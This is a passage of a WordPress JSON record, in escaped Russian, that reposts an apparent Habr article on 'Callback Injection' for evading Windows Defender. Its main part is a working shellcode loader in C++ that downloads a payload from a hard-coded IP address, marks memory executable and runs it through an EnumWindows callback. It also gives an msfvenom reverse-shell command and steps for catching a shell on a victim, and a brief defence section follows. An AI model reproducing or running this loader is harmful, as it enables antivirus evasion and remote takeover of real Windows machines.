\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439<\/strong> (WDAC\/AppLocker)<\/p>\n<\/li>\n<\/ol>\n<h3>7. \u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/h3>\n<p>Callback Injection &#8212; \u044d\u0442\u043e \u043d\u0435 \u043d\u043e\u0432\u0430\u044f \u0442\u0435\u0445\u043d\u0438\u043a\u0430, \u043d\u043e \u043e\u043d\u0430 <strong>\u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442<\/strong> \u043d\u0430 \u043c\u043d\u043e\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445.<\/p>\n<p><strong>\u041f\u043e\u0447\u0435\u043c\u0443 \u044f \u0434\u0435\u043b\u044e\u0441\u044c \u044d\u0442\u0438\u043c?<\/strong><\/p>\n<p>\u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0430\u0442\u0430\u043a &#8212; \u043f\u0435\u0440\u0432\u044b\u0439 \u0448\u0430\u0433 \u043a \u0438\u0445 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e. Windows Defender \u043e\u0442\u043b\u0438\u0447\u043d\u043e \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 &#171;\u0448\u043a\u043e\u043b\u044c\u043d\u044b\u0445&#187; \u043c\u0435\u0442\u043e\u0434\u043e\u0432, \u043d\u043e \u043f\u0440\u043e\u0442\u0438\u0432 \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u043a \u043e\u043d \u0432\u0441\u0451 \u0435\u0449\u0451 \u0443\u044f\u0437\u0432\u0438\u043c.<\/p>\n<p><strong>\u0427\u0442\u043e \u0434\u0430\u043b\u044c\u0448\u0435?<\/strong><\/p>\n<p>P.S. \u041f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f\u043c\u0438 \u044f \u0432\u044b\u043b\u043e\u0436\u0438\u043b \u043d\u0430 GitHub (<a href=\"https:\/\/github.com\/NewComrade12211\/callbackinjection\/blob\/main\/callbackinjection.cpp\" rel=\"noopener noreferrer nofollow\">https:\/\/github.com\/NewComrade12211\/callbackinjection\/blob\/main\/callbackinjection.cpp<\/a>).<\/p>\n<p>\u0412 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0438 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 &#8212; \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 callback-\u0444\u0443\u043d\u043a\u0446\u0438\u0439 (EnumChildWindows, EnumFonts, EnumPrinters). \u0410 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0436\u0443, \u043a\u0430\u043a \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u0447\u0442\u043e\u0431\u044b \u043e\u0431\u043e\u0439\u0442\u0438 \u0434\u0430\u0436\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437.\u041f\u043e\u0434\u043f\u0438\u0441\u044b\u0432\u0430\u0439\u0442\u0435\u0441\u044c \u043d\u0430 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c-\u043a\u0430\u043d\u0430\u043b, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u0440\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u044c <a href=\"https:\/\/t.me\/c2signals\" rel=\"noopener noreferrer nofollow\">https:\/\/t.me\/c2signals<\/a>.<\/p>\n<\/div>\n<p>\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/1023818\/\">https:\/\/habr.com\/ru\/articles\/1023818\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\ud83d\udccc \u041e\u0433\u043b\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435: \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0438\u043d\u044a\u0435\u043a\u0446\u0438\u0438\u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 Callback Injection\u041f\u043e\u0447\u0435\u043c\u0443 \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u0440\u043e\u0442\u0438\u0432 Defender\u041f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 (\u0441 \u043a\u043e\u0434\u043e\u043c)\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b\u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f\u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u04351. \u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u044c\u0442\u0435 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e: \u0432\u044b \u043d\u0430 \u043f\u0435\u043d\u0442\u0435\u0441\u0442\u0435, \u0443 \u0432\u0430\u0441 \u0435\u0441\u0442\u044c \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u043d\u043e Windows Defender \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u0435\u0442 \u043b\u044e\u0431\u043e\u0439 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0432\u044b\u0437\u043e\u0432. CreateRemoteThread \u2014 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f. QueueUserAPC \u2014 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f. NtCreateThreadEx \u2014 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f.\u0427\u0442\u043e \u0434\u0435\u043b\u0430\u0442\u044c?\u041e\u0442\u0432\u0435\u0442: \u043d\u0435 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043f\u043e\u0442\u043e\u043a\u0438 \u0441\u0430\u043c\u043e\u043c\u0443, \u0430 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u0442\u044c Windows \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u044d\u0442\u043e \u0437\u0430 \u0432\u0430\u0441.Callback Injection &#8212; \u044d\u0442\u043e \u0442\u0435\u0445\u043d\u0438\u043a\u0430, \u043f\u0440\u0438 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0432\u044b \u00ab\u043e\u0434\u0430\u043b\u0436\u0438\u0432\u0430\u0435\u0442\u0435\u00bb \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u043f\u043e\u0442\u043e\u043a Windows, \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0435\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0432\u0430\u0448 \u043a\u043e\u0434 \u0447\u0435\u0440\u0435\u0437 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 callback-\u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b.2. \u0427\u0442\u043e \u0442\u0430\u043a\u043e\u0435 Callback InjectionCallback &#8212; \u044d\u0442\u043e \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0432\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u0451\u0442\u0435 Windows, \u0447\u0442\u043e\u0431\u044b \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0432\u044b\u0437\u0432\u0430\u043b\u0430 \u0435\u0451 \u043f\u0440\u0438 \u043d\u0430\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0441\u043e\u0431\u044b\u0442\u0438\u044f.Windows \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0441\u043e\u0442\u043d\u0438 callback-\u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u043e\u0432:EnumWindows \u2014 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u043e\u043a\u043e\u043dEnumChildWindows \u2014 \u0434\u043b\u044f \u0434\u043e\u0447\u0435\u0440\u043d\u0438\u0445 \u043e\u043a\u043e\u043dEnumFonts \u2014 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u0448\u0440\u0438\u0444\u0442\u043e\u0432SetTimer \u2014 \u0434\u043b\u044f \u0442\u0430\u0439\u043c\u0435\u0440\u043e\u0432SetWinEventHook \u2014 \u0434\u043b\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439\u0418 \u043c\u043d\u043e\u0433\u0438\u0435 \u0434\u0440\u0443\u0433\u0438\u0435\u2026\u0418\u0434\u0435\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432\u044b:\u0412\u044b\u0434\u0435\u043b\u044f\u0435\u0442\u0435 \u043f\u0430\u043c\u044f\u0442\u044c \u0441 \u0448\u0435\u043b\u043b\u043a\u043e\u0434\u043e\u043c\u041c\u0435\u043d\u044f\u0435\u0442\u0435 \u0437\u0430\u0449\u0438\u0442\u0443 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u0443\u044e\u041f\u0435\u0440\u0435\u0434\u0430\u0451\u0442\u0435 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 lParam\u0412 callback&#8217;\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0435 \u0435\u0433\u043eWindows \u0441\u0430\u043c\u0430 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0432\u0430\u0448 \u043a\u043e\u0434 \u0432 \u0441\u0432\u043e\u0451\u043c \u043f\u043e\u0442\u043e\u043a\u0435.3. \u041f\u043e\u0447\u0435\u043c\u0443 \u044d\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u0440\u043e\u0442\u0438\u0432 Defender\u041f\u043e\u0447\u0435\u043c\u0443 EnumWindows \u043d\u0435 \u0434\u0435\u0442\u0435\u043a\u0442\u0438\u0442\u0441\u044f?EnumWindows &#8212; \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0430\u044f \u0442\u044b\u0441\u044f\u0447\u0430\u043c\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439Callback \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 ntdll!ZwEnumerateWindows, \u0447\u0442\u043e \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u0432\u044b\u0437\u043e\u0432EDR \u0440\u0435\u0434\u043a\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442, \u0447\u0442\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 callback&#8217;\u04354. \u041f\u043e\u043b\u043d\u044b\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 (\u0441 \u043a\u043e\u0434\u043e\u043c)\u0428\u0430\u0433 1: \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430std::vector&lt;BYTE&gt; DownloadFile(const wchar_t* server, int port, const wchar_t* path) {    HINTERNET hSession = WinHttpOpen(L&#187;WinHTTP\/1.0&#8243;, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,                                       WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);    HINTERNET hConnect = WinHttpConnect(hSession, server, port, 0);    HINTERNET hRequest = WinHttpOpenRequest(hConnect, L&#187;GET&#187;, path, NULL,                                              WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);        WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,                        WINHTTP_NO_REQUEST_DATA, 0, 0, 0);    WinHttpReceiveResponse(hRequest, NULL);        std::vector&lt;BYTE&gt; result;    BYTE buffer[4096];    DWORD bytesRead;    while (WinHttpReadData(hRequest, buffer, sizeof(buffer), &amp;bytesRead) &amp;&amp; bytesRead &gt; 0) {        result.insert(result.end(), buffer, buffer + bytesRead);    }        WinHttpCloseHandle(hRequest);    WinHttpCloseHandle(hConnect);    WinHttpCloseHandle(hSession);        return result;}\u0428\u0430\u0433 2: Callback-\u0444\u0443\u043d\u043a\u0446\u0438\u044fBOOL CALLBACK InjectionCallback(HWND hwnd, LPARAM lParam) {    \/\/ lParam \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u043d\u0430\u0448 \u0448\u0435\u043b\u043b\u043a\u043e\u0434    void (*shellcode)() = (void(*)())lParam;        \/\/ \u0412\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c!    shellcode();        \/\/ \u041e\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0431\u043e\u0440 \u043f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043e\u043a\u043d\u0430    return FALSE;}\u0428\u0430\u0433 3: \u041e\u0441\u043d\u043e\u0432\u043d\u0430\u044f \u043b\u043e\u0433\u0438\u043a\u0430int main() {    \/\/ 1. \u0421\u043a\u0430\u0447\u0438\u0432\u0430\u0435\u043c \u0448\u0435\u043b\u043b\u043a\u043e\u0434    auto shellcode = DownloadFile(L&#187;31.44.0.193&#8243;, 8080, L&#187;\/payload.bin&#187;);        \/\/ 2. \u0412\u044b\u0434\u0435\u043b\u044f\u0435\u043c \u043f\u0430\u043c\u044f\u0442\u044c    LPVOID pMemory = VirtualAlloc(NULL, shellcode.size(),                                    MEM_COMMIT | MEM_RESERVE,                                    PAGE_READWRITE);        \/\/ 3. \u041a\u043e\u043f\u0438\u0440\u0443\u0435\u043c    memcpy(pMemory, shellcode.data(), shellcode.size());        \/\/ 4. \u041c\u0435\u043d\u044f\u0435\u043c \u0437\u0430\u0449\u0438\u0442\u0443 \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u0443\u044e    DWORD oldProtect;    VirtualProtect(pMemory, shellcode.size(), PAGE_EXECUTE_READWRITE, &amp;oldProtect);        \/\/ 5. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u0447\u0435\u0440\u0435\u0437 callback    EnumWindows((WNDENUMPROC)InjectionCallback, (LPARAM)pMemory);        \/\/ 6. \u041e\u0447\u0438\u0441\u0442\u043a\u0430 (\u0441\u044e\u0434\u0430 \u043d\u0435 \u0434\u043e\u0445\u043e\u0434\u0438\u043c, \u0435\u0441\u043b\u0438 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0443\u0441\u043f\u0435\u0448\u0435\u043d)    VirtualFree(pMemory, 0, MEM_RELEASE);        return 0;}\u0427\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u043f\u043e\u0434 \u043a\u0430\u043f\u043e\u0442\u043e\u043c?1. VirtualAlloc \u2192 \u0432\u044b\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u0430\u043c\u044f\u0442\u044c (PAGE_READWRITE)2. memcpy \u2192 \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u0448\u0435\u043b\u043b\u043a\u043e\u04343. VirtualProtect \u2192 \u043c\u0435\u043d\u044f\u0435\u0442 \u0437\u0430\u0449\u0438\u0442\u0443 \u043d\u0430 PAGE_EXECUTE_READWRITE4. EnumWindows \u2192 \u043f\u0435\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u0442 \u0432\u0441\u0435 \u043e\u043a\u043d\u0430, \u0432\u044b\u0437\u044b\u0432\u0430\u044f \u0432\u0430\u0448 callback5. Callback \u2192 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0448\u0435\u043b\u043b\u043a\u043e\u04346. \u0428\u0435\u043b\u043b\u043a\u043e\u0434 \u2192 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, reverse shell\u0412\u0430\u0436\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442: \u041a\u043e\u0434 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u043f\u043e\u0442\u043e\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u044b\u0437\u0432\u0430\u043b EnumWindows. \u042d\u0442\u043e \u043f\u043e\u0442\u043e\u043a \u0432\u0430\u0448\u0435\u0433\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0448\u0435\u043b\u043b\u043a\u043e\u0434 \u0431\u0443\u0434\u0435\u0442 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c\u0441\u044f \u0441 \u0442\u0435\u043c\u0438 \u0436\u0435 \u043f\u0440\u0430\u0432\u0430\u043c\u0438, \u0447\u0442\u043e \u0438 \u0432\u0430\u0448\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430.5. \u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b\u041f\u043e\u0434\u0433\u043e\u0442\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043d\u0430\u0448\u0443 \u0442\u0435\u0441\u0442\u0438\u0440\u0443\u0435\u043c\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 (\u0432\u043a\u043b\u044e\u0447\u0430\u0435\u043c \u0432\u0441\u0435 \u0447\u0442\u043e \u0435\u0441\u0442\u044c \u0432 \u0437\u0430\u0449\u0438\u0442\u043d\u0438\u043a\u0435)\u0414\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u044f \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e Defender2. \u041f\u043e\u0434\u0433\u043e\u0442\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u043c \u043d\u0430\u0448 shellcode \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440 \u043d\u0430 VPS msfvenom -p windows\/x64\/shell_reverse_tcp LHOST=ip LPORT=4444 -f raw -o shellcode.binpython3 -m http.server 8080\u0413\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u043c shellcode \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u04403. \u041c\u0435\u043d\u044f\u0435\u043c \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u0432 \u043a\u043e\u0434\u0435\u041f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0430\u0434\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0430 \u0432\u0430\u0448 IP\/PORT\u0415\u0441\u043b\u0438 \u0434\u043b\u044f \u0442\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0431\u0443\u0434\u0435\u0442\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043c\u043e\u0439 \u043a\u043e\u0434 \u0442\u043e \u043d\u0430\u0434\u043e \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c \u044d\u0442\u0438 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f \u043d\u0430 \u0432\u0430\u0448\u04384. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c exploit\/multi\/handler \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0448\u0435\u043b\u043b\u0430\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a exploit\/multi\/handler5. \u0417\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c \u043d\u0430 \u0436\u0435\u0440\u0442\u0432\u0435 \u043d\u0430\u0448 \u043a\u043e\u0434 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0448\u0435\u043b\u043b!PROFIT!6. \u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f\u0414\u043b\u044f \u0437\u0430\u0449\u0438\u0442\u043d\u0438\u043a\u043e\u0432:\u041c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u0442\u044c \u0432\u044b\u0437\u043e\u0432\u044b VirtualProtect \u0441 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435\u043c \u0437\u0430\u0449\u0438\u0442\u044b \u043d\u0430 PAGE_EXECUTE_READWRITE\u0410\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0442\u044c callback-\u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u2014 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c, \u043d\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043b\u0438 lParam \u043d\u0430 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c EDR \u0441 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u0438\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u043e\u043c \u2014 CrowdStrike \u0438 Carbon Black \u0434\u0435\u0442\u0435\u043a\u0442\u044f\u0442 \u044d\u0442\u0443 \u0442\u0435\u0445\u043d\u0438\u043a\u0443 \u043d\u0430 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u043e\u043c \u0443\u0440\u043e\u0432\u043d\u0435\u0412\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 (WDAC\/AppLocker)7. \u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435Callback Injection &#8212; \u044d\u0442\u043e \u043d\u0435 \u043d\u043e\u0432\u0430\u044f \u0442\u0435\u0445\u043d\u0438\u043a\u0430, \u043d\u043e \u043e\u043d\u0430 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043c\u043d\u043e\u0433\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445.\u041f\u043e\u0447\u0435\u043c\u0443 \u044f \u0434\u0435\u043b\u044e\u0441\u044c \u044d\u0442\u0438\u043c?\u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0430\u0442\u0430\u043a &#8212; \u043f\u0435\u0440\u0432\u044b\u0439 \u0448\u0430\u0433 \u043a \u0438\u0445 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044e. Windows Defender \u043e\u0442\u043b\u0438\u0447\u043d\u043e \u0437\u0430\u0449\u0438\u0449\u0430\u0435\u0442 \u043e\u0442 &#171;\u0448\u043a\u043e\u043b\u044c\u043d\u044b\u0445&#187; \u043c\u0435\u0442\u043e\u0434\u043e\u0432, \u043d\u043e \u043f\u0440\u043e\u0442\u0438\u0432 \u043f\u0440\u043e\u0434\u0432\u0438\u043d\u0443\u0442\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u043a \u043e\u043d \u0432\u0441\u0451 \u0435\u0449\u0451 \u0443\u044f\u0437\u0432\u0438\u043c.\u0427\u0442\u043e \u0434\u0430\u043b\u044c\u0448\u0435?P.S. \u041f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f\u043c\u0438 \u044f \u0432\u044b\u043b\u043e\u0436\u0438\u043b \u043d\u0430 GitHub (https:\/\/github.com\/NewComrade12211\/callbackinjection\/blob\/main\/callbackinjection.cpp).\u0412 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0438 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 &#8212; \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 callback-\u0444\u0443\u043d\u043a\u0446\u0438\u0439 (EnumChildWindows, EnumFonts, EnumPrinters). \u0410 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043a\u0430\u0436\u0443, \u043a\u0430\u043a \u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0448\u0435\u043b\u043b\u043a\u043e\u0434, \u0447\u0442\u043e\u0431\u044b \u043e\u0431\u043e\u0439\u0442\u0438 \u0434\u0430\u0436\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437.\u041f\u043e\u0434\u043f\u0438\u0441\u044b\u0432\u0430\u0439\u0442\u0435\u0441\u044c \u043d\u0430 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c-\u043a\u0430\u043d\u0430\u043b, \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u0440\u043e\u043f\u0443\u0441\u0442\u0438\u0442\u044c https:\/\/t.me\/c2signals.\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 https:\/\/habr.com\/ru\/articles\/1023818\/<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-476051","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/476051","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=476051"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/476051\/revision